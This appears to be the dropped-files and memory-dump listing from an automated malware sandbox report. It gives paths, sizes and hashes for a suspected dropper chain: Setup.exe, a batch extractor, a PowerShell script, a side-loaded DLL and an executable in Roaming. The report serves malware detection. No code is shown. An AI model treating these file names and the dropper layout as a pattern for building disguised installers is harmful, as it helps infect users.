C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
4ddc230a8db8cecad61d8c7c894b6bae

SHA1
de01c54427f718dac8fd58c86fd1faf02331868e

SHA256
9a5b62762f79da352dc772797b7a033e254ac1bc424c9f22a56ff0bda5b753ac

SHA512
8c274c2d2b1c72fb6fb8d12a684fc874c83af12e54d30914bbc8f3548e06059f672d30870b8b770c74551e60c6d59d8479b0a54349c7af46c774e679f3c0111f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
dedd6587f50a181346954e64306441b9

SHA1
b67c7d4eb5b7691f0b3bca2bb06977d0c2be340c

SHA256
6eb7f7b2b738148ddd04ab750328a9528d78bd20c3703f2400cece80948ee043

SHA512
e2d5686434e628728b2cf3e6e6e9c036fe61cc58d0295786e93bf2eedb3e92c580ddf1eaa6df5bc5fb5bcffe088e4271d432a8349cf9a7431326fe553d46f4a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
746908eebb3bc7cd930ac91d4dc34b2f

SHA1
9d1d3bfa5e9577a4e66b985e0b257686bd0d3ac7

SHA256
f914f3b3bd30c6daf33a9ca17fc225bd41417777d8a9873e3d9ebde29aa01873

SHA512
0e07fcc76fdba3a72c8429081a2450bdaccf7147e06af9cc8657f9d43c2a350247d5aa2b656ca0306216126a31de4ac471718ffa906e20d72bc6b71749739a3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
2c43c077cacae2bcb9a9497f95b9f46b

SHA1
f8e52255e3ed0c064f9614e260d5de6c61b785cf

SHA256
6dd9379236e432876872e4bcec3bad0ff81fc8cca5a8801addcf64fea3380a97

SHA512
b02cf50d2a1ed8876511e9420ca17f525a9e31bfeb8038f665c5cbcb9d7c6a4d7801cd5a04321bc93ba1ee5d61d564b0ab903f126eadff90bf5f895b89639db2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
fb8d74ffb854eaeb037db27875976eb8

SHA1
98f51ff1e1d36761f012ea484289070a7b5229c2

SHA256
3ed05154a10658c0590c6766d796a6fddc87dbfd4320e7af66add27bbc89af3f

SHA512
b7c46e20e754ba332f1754ec1563d8b0a6bdcf7da542e308a26bc5848b201fac34f47d9357349ae752243a6eda631182d0a636bb2c03eefd6d4ff9a168aaa75e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ae7a21b524532b18a0fcc42b1b12a461

SHA1
39b57300c68e46babf52881ecbf51a77015bfd28

SHA256
2347f9ad408c3e37b2c9a1b1f2c5e70aac8aca09555d446b8ada3d108768a760

SHA512
99630f281d2cda30b7ff3fab41814530c4ab10ddc9f3223a6cb140b9d3de40fe3c54d347213947ba6c5d40b38a05766dbf99a34140cd343993697f423e8ef355

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
f12895ea7b9711baf009a1e37c3cd063

SHA1
4abbc8ffa8bb605dd03f551d745ddbd67d87aca7

SHA256
8b7584125afb2933a5f5122129387e18fcb50f45e4410b208aa91ebaa2074129

SHA512
2cff42c39ae83b4fa741023f031d5c8ea2dfe462539ac9898794fd08c150e1d2e16012369d324b3bb28108808eabfc1f2a0ac14004ae99ecb8487ee193cd1eaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
a2637fd0d5f9e45bc09d85f43942327b

SHA1
d1e4759175b6a2b23d3ab375504fb142cf4f13ca

SHA256
5307d51f70db06fe65ad5f5c4d62273f2e4e106bfe3cf4f798d337bd819451c6

SHA512
dfb9aa5cd27960d7a867d6e42d183ec0c317bcbe569ac3345467fa99b4d9f61cdc2424af6306f85de103d708b30ab292ccd92a0c50ad4135682276d54724eb91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
4fa85f61c08a6d96d7d5070ae86e8ced

SHA1
99af0317c5a3a84ee9a36e9789cc6ffe3d35f960

SHA256
8d4bcec1db9791754e1e83e9dfa936fe6f3a285ed1a6dd5ce2cc769aa0992d2b

SHA512
c377e88a7497ce2fa5c3c59a9dfa2423ab757ab81ce69fd330031ea1f20cc131491af8a01ba7d40357506d878d20f771aeeb5ae807ee6ce9ab24756ae990ab3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
7a84a9e6695a930d0df4d433334387f8

SHA1
1d8c6765bc1f8ddf45c5ab3e8c5076c2a954b8c4

SHA256
4780b8c7fd93e37227a6d86bc28de19acd536dea5aa497ac2296e501c9e7a741

SHA512
8833e2f0b6d001ee1ccc1a77f6cefa50c0e831efac5eff2f5dfbbf102a28c4ab269252ad77c2b2154f4c40a0fbdba61b5afc7e1aa6e84686c14459dc9209d3bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586339.TMP

Filesize
1KB

MD5
60c58095d006356493b2846dc2b0f0b4

SHA1
57fdda9ece215bcfce6de7cc99e4a18f8ef443f6

SHA256
abf78a51ab4a4102c40e2110541dacb37f2eae0b0fadb757df7e67047ab39e94

SHA512
97db1b5edfd61568a671fe11a27a4619e9b358f248963b77dd08ba4c5ac1eb209e349050140a1005dd2f5a26422da43e99e880784c790baa2fc06c51ae830f0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
33e3d20d6f45b48a631c67850aad3781

SHA1
e2d79f63129574a69d50dc2631070fb307b20032

SHA256
5458c3d5d5f3a3e83171bf74dd676a0c9c94ca34db2ef29aa818096d23c002f3

SHA512
c4f5788d0a33c34f4308498fdea95e394c63a6ba452c5d1e1aaf78b41fc04f5d74c4c1377bf94628209789e42364521da00ddcec2bd7f048efe15874af070650

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
abd0a59e0752eb4c74e9c566c4a25086

SHA1
bd482df06cf6991737c243929c37009778a3e654

SHA256
85f9cd5000da1ca37d37a73157dc14785e5ea5f6b0f5a53c3b98e0c3a9eee407

SHA512
35a5ab5587a5ac4dcd275821b3465aba956a87c131492c60944d8d60c480586ae2c160df2e5f17f9d4a7adc9140495acea2abd9370f65e153e22326a269047a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2ddaeb16fb8781ee3e122bbc7a7e70ad

SHA1
212e746863d0c2a05677b14aa2e175474d49d9ec

SHA256
e0069798ec7ba073b85be3db8e944081e0c6cb1cfc1551e861968708ed31b989

SHA512
7e6e7fae1cfe7f2031424ac322b221508fb2c8d9b1b93aa5962b719df381e398b0a9290a4a7a473d96e4e02ae96d4a303b3683cc3bf595fa915b241f2df2bd0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9434ee9724b97ee4dc3cf628e0d68f9f

SHA1
39ff179d119134fc0d3ad1a2f8cfbc4c9d3e2d00

SHA256
8a18d7cb57a75a497834f741b21303d93252489e73c86b53a3d2a45e54050e31

SHA512
d1a3928002b5e28aa1c1b278efbe2ebf37d9cdc29fe742ab51f6df22531bdd75db0d4015517d4d230b56a17a3079cf6036d9516ac7bc47e0fe66502f3b6fccf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
07b730e3e652f73d5c7575b9ea26cc3e

SHA1
2cd7035a07baafd91e6669c7c049cba05169d5ac

SHA256
0134187582787a353bebe8875425cf545fc5aaf80e8b9269f9c3bd9eb8486855

SHA512
405ddbac3ed0f7ef3fdd39ede5b337c249505912fa4b632da4ea9c50e897ee77556a4d171963347feef0855564f1553263fba7b03b3b040a5f545c70c8f8d04e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7e064b82-e1f7-4327-aa08-5fe9fa5bea2f.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u2piawou.1bt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4240_1591946607\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\JKTAP89G.exe

Filesize
504KB

MD5
46820216884c1d27195cbb9b693dbb65

SHA1
c2de2e722cfb963ea34a1f49ecb8c0685cbacf59

SHA256
d29c25653a1aa3d1a034cc9e66afd9d3d1dfc0eb9a4c0c51c7b52f052d6d88bb

SHA512
febc9694e06d375db4ea37569182bcf1d2a1b385d521c9fdf135693efb6ea95ff878609909aa235c545906fa624ad027081c8b82c79d188693a02f6f2af5b57e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
b3381feea309dab198d0f6db77dde70c

SHA1
930e5305a333dbb3763156f48119cb1d0061be19

SHA256
3377154cd20a0f954004c038dd139a354b74f00bf5caa3d5e8e875073665d907

SHA512
59d58608cbf4ab34ab459cc983f6fdc9da11d23ab85c5ecd481df5e9bb9761fdb0aef5ee776b86eb4bad8100bd93dc7658817258e24bcf48b4c4546dcad73476

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
3467b12c4d82812fc779b3a7f10e561d

SHA1
e9510f8d41fc31ead579fd4db2313021b57865cf

SHA256
c704be48fb2118b31dfa7eee136fb3795938da58be43091312e56c9ea002dda1

SHA512
b784f0cab660ae02e1306a690c60703d4860f38849e857b1eb7bb4ddda82c18f64ce06551030fd41a53589be25f7a88968c1b0f0d3fe9fcb770b7f9d4ce8284a

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.exe

Filesize
44KB

MD5
f86507ff0856923a8686d869bbd0aa55

SHA1
d561b9cdbba69fdafb08af428033c4aa506802f8

SHA256
94f4fd6f2cb781ae7839ad2ee0322df732c8c7297e62834457662f8cde29dcbb

SHA512
6c1c073fc09498407b2c6b46d7a7e04c2db3c6f8d68c0dc0775211864c4508c48c2bd92e3849dc3805caacc856f9e31e1eea118661a55f526bfa61638f88c3da

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe

Filesize
828KB

MD5
426ccb645e50a3143811cfa0e42e2ba6

SHA1
3c17e212a5fdf25847bc895460f55819bf48b11d

SHA256
cf878bfbd9ed93dc551ac038aff8a8bba4c935ddf8d48e62122bddfdb3e08567

SHA512
1ab13e8e6e0ca4ca2039f104d53a5286c4196e930319c4fe374fa3bf415214bb7c7d2a9d8ca677a29c911a356cca19a1cecae16dd4bf840bce725f20de4c8ff2

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\bin

Filesize
2KB

MD5
7962313e120c69398a763a1ff2ac0164

SHA1
215645ba6ee318a96d7969c06a57739639a05817

SHA256
25881f2a1e8cd884675d1694e1ddff905864bbf412324573213a6a254d21b5c2

SHA512
9bba21a34ca2a1996c9393e7986858c0c7facebad7a4a155a374270449feb09e7bb398a4e5b5fdbb5904c8b4eb7e3d1e401a6126f7978a9b973ce27a1a157344

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extract_and_run.bat

Filesize
952B

MD5
fae61599308bbc78cae99ebdcb666f43

SHA1
de0a1d2344b09b29b1040bd4904f604a47a6d8c6

SHA256
f65af4a3d9d7f4464de4f7c136122f548c3b662a389e569d842be7e3a60d7863

SHA512
8e3d8d8ed97e65acd719d60624fa5c5506696e6fbbad5b0466748cccc24832e130bdf584fe0ce55f14628c68ca0a602310f7cb964cd38cf56735a6c64e4ddbf3

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extracted_18513\script.ps1

Filesize
2KB

MD5
99415b8fc82ca4f7f74bb44ff6a3728b

SHA1
71f6ab43986039707a2000e4ce7220adba80713e

SHA256
023cd9c0eeabc40c3724fe2aa3387a14d0baf76cfc7fa78aa9613a0e43e9a390

SHA512
149a48eed0bdc21a851a2d554e2a85371b7f2ea5d36296b6615eae5d57fdfeb755ad6dba5f89e8ec5c3e3ca537019687b3e955f939c39b7484b87e75acb5c0f2

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extracted_18513\sss.bat

Filesize
405B

MD5
9ca3883fd45a5a455e64704ac6151ac9

SHA1
e7f89032ce544253a51020d7e894f6919fc35839

SHA256
c981688479756c987d6207e5804ed2b97fb50dfc80469309646c3f79d5ed05b4

SHA512
e5746faaae0680f68295db94f3865a7ec56663553d7401f996cce18bdc67ade23aef10c81018da28992e82a8178dc8a567b5b355479c7ceedfb87e46be9efa5a

Download Submit
C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\mapistub.dll

Filesize
218KB

MD5
19f2358e19e6216a1c869fd86cd38df6

SHA1
ec475b62bd4162615509ed1bf597b670392965e6

SHA256
fc67d0ecb73cc51baa0f0f1e2a13fc18d8a9bdfca6f5ffaedd61d2c2eb9cb864

SHA512
c009f5a2a917cd3a4159ac895d0621b433e73997c87cbf50a80e43d55a743aec7ba0681c29066e35afc25c1fa60c6f5a7257c9b6667f8e13722e314e75e0dd48

Download Submit
memory/2068-1160-0x0000000005BF0000-0x0000000006196000-memory.dmp

Filesize
5.6MB

Download
memory/2068-1159-0x0000000000B10000-0x0000000000B98000-memory.dmp

Filesize
544KB

Download
memory/3316-1072-0x0000022831F40000-0x0000022831F62000-memory.dmp

Filesize
136KB

Download
memory/3476-1140-0x00000217E64D0000-0x00000217E661F000-memory.dmp

Filesize
1.3MB

Download
memory/3476-1128-0x00000217E64D0000-0x00000217E661F000-memory.dmp

Filesize
1.3MB

Download
memory/3476-1158-0x00000217E64D0000-0x00000217E661F000-memory.dmp

Filesize
1.3MB

Download
memory/4584-1180-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1172-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1610-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1609-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1162-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1164-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1171-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1173-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1179-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1178-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1177-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1176-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1175-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4584-1174-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4868-1139-0x0000027D6EAE0000-0x0000027D6EC2F000-memory.dmp

Filesize
1.3MB

Download